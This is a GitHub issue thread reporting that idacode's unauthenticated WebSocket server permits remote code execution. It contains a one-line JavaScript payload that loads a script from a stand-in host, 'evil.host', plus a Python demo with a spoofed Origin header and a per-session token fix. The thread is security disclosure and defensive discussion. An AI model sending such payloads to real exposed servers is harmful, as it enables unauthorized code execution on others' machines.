ioncodes / idacode

An integration for IDA and VS Code which connects both to easily execute and debug IDAPython scripts.

Security concern on WebSocket #7

Open ChiChou opened 4 years ago

ChiChou commented 4 years ago

According to https://github.com/ioncodes/idacode/issues/5, a remote host is planned to be supported. There is no authentication for the socket server yet, so an attacker may be able to communicate with the server and trigger a remote code execution:

```javascript
// ws: an already-open WebSocket to the idacode server
ws.send(new Blob([JSON.stringify({event: 'execute_script', path: '\\\\evil.host\\calc.py'})]))
```

Luckily tornado has Origin validation by default, which means that if the HOST is 127.0.0.1, the attacker cannot talk to the backend from a web browser unless he's got a UXSS. But when using this utility for remote debugging (e.g., Host = '0.0.0.0'), it is possible for the attacker to spoof the Origin header and trigger a 0-click RCE.

Maybe adding a random token validation upon connection can avoid such a problem.
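The difference between the Origin check and the proposed per-session token, as an added example that is not idacode's code and not part of this issue thread. The handler class, the `?token=` query parameter, the host name and the message handling are assumptions made for the illustration; the Origin logic mirrors the usual browser-oriented check (Origin host must match the Host header, and the check is skipped when no Origin header is sent) in plain Python so it runs without tornado.

```python
"""Added example: why an Origin check alone does not protect a control
WebSocket bound to 0.0.0.0, and how a per-session random token does.
All names and the message format are assumptions, not idacode's API.
"""
import hmac
import json
import secrets
from urllib.parse import parse_qs, urlparse


def issue_token() -> str:
    """Per-session secret the server would print/write at startup and the
    legitimate client must present on connect (assumed transport)."""
    return secrets.token_urlsafe(32)


def origin_allowed(headers: dict) -> bool:
    """Browser-style Origin check: Origin host must equal the Host header.
    Browsers cannot forge Origin, but any non-browser client can set it to
    anything (or omit it), so this only stops attacks launched from a
    victim's browser, not a direct connection from the attacker."""
    origin = headers.get("Origin")
    if origin is None:  # non-browser clients usually send no Origin
        return True
    return urlparse(origin).netloc.lower() == headers.get("Host", "").lower()


def token_allowed(request_uri: str, expected: str) -> bool:
    """Require ?token=<secret> on the upgrade request; constant-time compare."""
    presented = parse_qs(urlparse(request_uri).query).get("token", [""])[0]
    return hmac.compare_digest(presented.encode(), expected.encode())


class ControlServer:
    """Stand-in for the WebSocket handler (assumed): a connection is either
    accepted or not, and 'execute_script' is dispatched only when accepted."""

    def __init__(self, require_token: bool = True):
        self.token = issue_token()
        self.require_token = require_token
        self.executed = []  # paths handed to the (assumed) script runner

    def open(self, request_uri: str, headers: dict) -> bool:
        """Return True if the upgrade request is accepted."""
        if not origin_allowed(headers):
            return False
        if self.require_token and not token_allowed(request_uri, self.token):
            return False
        return True

    def on_message(self, accepted: bool, raw: str) -> bool:
        """Dispatch one JSON message; return True if a script would run."""
        if not accepted:
            return False
        msg = json.loads(raw)
        if msg.get("event") == "execute_script":
            self.executed.append(msg["path"])  # a real server would exec it
            return True
        return False


def demo() -> dict:
    """Constructed handshake against a server exposed on the network
    (host name and port are made up for the example)."""
    host = "ida-host.example:4000"
    spoofed = {"Host": host, "Origin": "http://" + host}  # forged by attacker
    payload = json.dumps({"event": "execute_script",
                          "path": "\\\\evil.host\\calc.py"})

    unauth = ControlServer(require_token=False)  # today: Origin check only
    ok_unauth = unauth.open("/", spoofed)
    ran_unauth = unauth.on_message(ok_unauth, payload)

    auth = ControlServer()  # proposed: random token required on connect
    ok_no_token = auth.open("/", spoofed)
    ran_no_token = auth.on_message(ok_no_token, payload)
    ok_bad_token = auth.open("/?token=" + secrets.token_urlsafe(32), spoofed)
    ok_good_token = auth.open("/?token=" + auth.token, spoofed)
    ran_good = auth.on_message(ok_good_token, payload)

    return {
        "origin_check_passes_spoof": origin_allowed(spoofed),
        "unauth_rce": ran_unauth,
        "no_token_rejected": (not ok_no_token) and (not ran_no_token),
        "bad_token_rejected": not ok_bad_token,
        "good_token_accepted": ok_good_token and ran_good,
        "unauth_executed": list(unauth.executed),
        "auth_executed": list(auth.executed),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

A query-string token is the simplest thing to demonstrate; in a real deployment it would be better carried in a header or as the first message so it does not end up in access logs, and written to a file readable only by the current user so the VS Code extension can pick it up.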

ioncodes commented 4 years ago

Thanks for opening up this issue. I will definitely track it along with #5. Exposing the server in this manner is at this stage discouraged (as mentioned by the README) but it's still an important feature and will find an implementation in the near future.